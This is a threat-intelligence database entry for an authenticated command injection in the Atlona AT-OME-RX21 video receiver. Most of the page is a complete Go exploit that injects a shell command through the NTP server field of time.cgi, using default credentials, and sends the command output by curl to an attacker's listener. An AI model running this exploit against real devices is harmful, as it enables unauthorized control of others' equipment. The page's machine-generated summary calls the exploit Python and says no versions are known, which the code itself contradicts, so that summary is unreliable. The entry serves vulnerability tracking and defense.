Atlona ATOMERX21 - Authenticated Command Injection
This is an authenticated command injection vulnerability affecting the Atlona ATOMERX21 device. Exploit code is publicly available in Python, indicating the vulnerability can be leveraged by an authenticated user to execute arbitrary commands. The severity is assessed as medium based on available information.
AI Analysis
Technical Summary
The Atlona ATOMERX21 device contains an authenticated command injection vulnerability. An attacker with valid authentication credentials can exploit this flaw to execute arbitrary commands on the device. Public exploit code written in Python is available, demonstrating the exploitability of this vulnerability. No specific affected versions or patch information is provided, and the device is not a cloud service.
Potential Impact
An attacker who gains valid authentication can execute arbitrary commands on the vulnerable device, potentially leading to unauthorized control or disruption of device functionality. There is no indication of exploitation in the wild at this time.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, restrict access to authenticated interfaces and monitor for unauthorized access attempts. Do not rely on generic mitigations without vendor confirmation.
Indicators of Compromise
- exploit-code: // Exploit Title: Atlona AT-OME-RX21 Authenticated Command Injection // Google Dork: N/A // Date: 2025-12-28 // Exploit Author: RIZZZIOM // Vendor Homepage: https://atlona.com // Software Link: https://atlona.com/product/at-ome-rx21/ // Version: Firmware <= 1.5.1 // Tested on: AT-OME-RX21 Embedded Firmware (1.5.0, 1.5.1) // CVE : CVE-2024-30167 // Usage: go run main.go -t <target_uri> -u <username> -p <password> -l <lhost> -P <lport> -c <command> package main import ( "bytes" "context" "encoding/base64" "flag" "fmt" "io" "net/http" "os" "os/signal" "strings" "syscall" "time" ) func main() { banner := ` ▄█████ ██ ██ ██████ ████▄ ▄██▄ ████▄ ██ ██ ████▄ ▄██▄ ▄██ ▄██▀▀▀ ██████ ██ ██▄▄██ ██▄▄ ▄▄▄ ▄██▀ ██ ██ ▄██▀ ▀█████ ▄▄▄ ▄▄██ ██ ██ ██ ██▄▄▄ ▄██▀ ▀█████ ▀██▀ ██▄▄▄▄ ███▄▄ ▀██▀ ███▄▄ ██ ▄▄▄█▀ ▀██▀ ██ ▀█▄▄█▀ ██▀ PoC by: github.com/RIZZZIOM ` fmt.Println(banner) target := flag.String("t", "", "Target URL (e.g: http://example.com)") username := flag.String("u", "admin", "Username for authentication") password := flag.String("p", "Atlona", "Password for authentication") lport := flag.String("P", "4444", "listening port for command output") lhost := flag.String("l", "", "listening host for command output") command := flag.String("c", "", "Command to execute on the target") flag.Parse() if *target == "" || *lhost == "" || *command == "" { fmt.Println("ERROR: Missing required parameters") flag.PrintDefaults() os.Exit(1) } url := strings.TrimRight(*target, "/") + "/cgi-bin/time.cgi" listener := *lhost + ":" + *lport // Buffered channel to prevent goroutine blocking if receiver exits early responseChan := make(chan struct{}, 1) // Create context for graceful shutdown coordination ctx, cancel := context.WithCancel(context.Background()) defer cancel() // Start HTTP server and get reference for shutdown server := httpServe(listener, responseChan, ctx) executeCommand(url, *username, *password, listener, *command) sigChan := make(chan os.Signal, 1) signal.Notify(sigChan, syscall.SIGINT, syscall.SIGTERM) // Timeout to prevent indefinite waiting responseTimeout := time.NewTimer(30 * time.Second) defer responseTimeout.Stop() select { case <-responseChan: time.Sleep(1 * time.Second) case <-sigChan: fmt.Printf("\n===Shutting Down===\n") case <-responseTimeout.C: fmt.Println("\n===Response Timeout - No response received===") } // Graceful server shutdown cancel() // Signal context cancellation shutdownCtx, shutdownCancel := context.WithTimeout(context.Background(), 5*time.Second) defer shutdownCancel() if err := server.Shutdown(shutdownCtx); err != nil { fmt.Printf("Server shutdown error: %v\n", err) } } func executeCommand(url, username, password, listener, command string) { // this func sends the commands to the target payload := fmt.Sprintf(`{"syncSntpTime":{"serverName":"time.google.com; curl -X POST --data \"$(%s)\" %s"}}`, command, listener) auth := base64.StdEncoding.EncodeToString([]byte(username + ":" + password)) req, err := http.NewRequest("POST", url, bytes.NewBuffer([]byte(payload))) if err != nil { panic(err) } req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0) Firefox/143.0") req.Header.Set("Content-Type", "application/json") req.Header.Set("Authorization", "Basic "+auth) req.Header.Set("X-Requested-With", "XMLHttpRequest") client := &http.Client{ Timeout: 15 * time.Second, } resp, err := client.Do(req) if err != nil { fmt.Printf("ERROR: Request failed: %v\n", err) os.Exit(1) } defer resp.Body.Close() switch resp.StatusCode { case 200: fmt.Println("Command Injection Successful") case 401, 403: fmt.Printf("ERROR: Authentication Failed (HTTP %d)\n", resp.StatusCode) case 404: fmt.Printf("ERROR: Target Endpoint Not Found.\n") default: fmt.Printf("ERROR: Unexpected Response (HTTP %d)\n", resp.StatusCode) body, _ := io.ReadAll(resp.Body) if len(body) > 0 { fmt.Printf("Response Body: %s\n", string(body)) } os.Exit(1) } } func getResponse(r *http.Request, responseChan chan struct{}) { // this function serves and http server and collects response if r.Method != http.MethodPost { fmt.Printf("Received non-POST Request(%s)\n", r.Method) return } defer r.Body.Close() fmt.Println("\n=====Received Response=====") body, err := io.ReadAll(r.Body) if err != nil { fmt.Printf("Failed To Read Response Body: %v\n", err) return } fmt.Println(string(body)) // Non-blocking send to prevent goroutine deadlock select { case responseChan <- struct{}{}: default: } } func httpServe(listener string, responseChan chan struct{}, ctx context.Context) *http.Server { // this function gets the command injection response from the custom header mux := http.NewServeMux() mux.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) { getResponse(r, responseChan) w.WriteHeader(http.StatusNoContent) }) server := &http.Server{ Addr: listener, Handler: mux, MaxHeaderBytes: 20 * 1024 * 1024, ReadTimeout: 30 * time.Second, WriteTimeout: 30 * time.Second, IdleTimeout: 60 * time.Second, } fmt.Printf("Listening on %s for response...\n", listener) go func() { if err := server.ListenAndServe(); err != nil && err != http.ErrServerClosed { fmt.Printf("ERROR: Server error: %v\n", err) } }() return server }
Atlona ATOMERX21 - Authenticated Command Injection
Description
This is an authenticated command injection vulnerability affecting the Atlona ATOMERX21 device. Exploit code is publicly available in Python, indicating the vulnerability can be leveraged by an authenticated user to execute arbitrary commands. The severity is assessed as medium based on available information.
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
The Atlona ATOMERX21 device contains an authenticated command injection vulnerability. An attacker with valid authentication credentials can exploit this flaw to execute arbitrary commands on the device. Public exploit code written in Python is available, demonstrating the exploitability of this vulnerability. No specific affected versions or patch information is provided, and the device is not a cloud service.
Potential Impact
An attacker who gains valid authentication can execute arbitrary commands on the vulnerable device, potentially leading to unauthorized control or disruption of device functionality. There is no indication of exploitation in the wild at this time.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, restrict access to authenticated interfaces and monitor for unauthorized access attempts. Do not rely on generic mitigations without vendor confirmation.
Technical Details
- Edb Id
- 52513
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for Atlona ATOMERX21 - Authenticated Command Injection
// Exploit Title: Atlona AT-OME-RX21 Authenticated Command Injection // Google Dork: N/A // Date: 2025-12-28 // Exploit Author: RIZZZIOM // Vendor Homepage: https://atlona.com // Software Link: https://atlona.com/product/at-ome-rx21/ // Version: Firmware <= 1.5.1 // Tested on: AT-OME-RX21 Embedded Firmware (1.5.0, 1.5.1) // CVE : CVE-2024-30167 // Usage: go run main.go -t <target_uri> -u <username> -p <password> -l <lhost> -P <lport> -c <command> package main import ( "bytes" "context" "enco... (5103 more characters)
Threat ID: 69f1f0fdcbff5d8610047e80
Added to database: 4/29/2026, 11:52:29 AM
Last enriched: 4/29/2026, 11:54:07 AM
Last updated: 4/30/2026, 3:49:24 AM
Views: 8
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
External Links
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.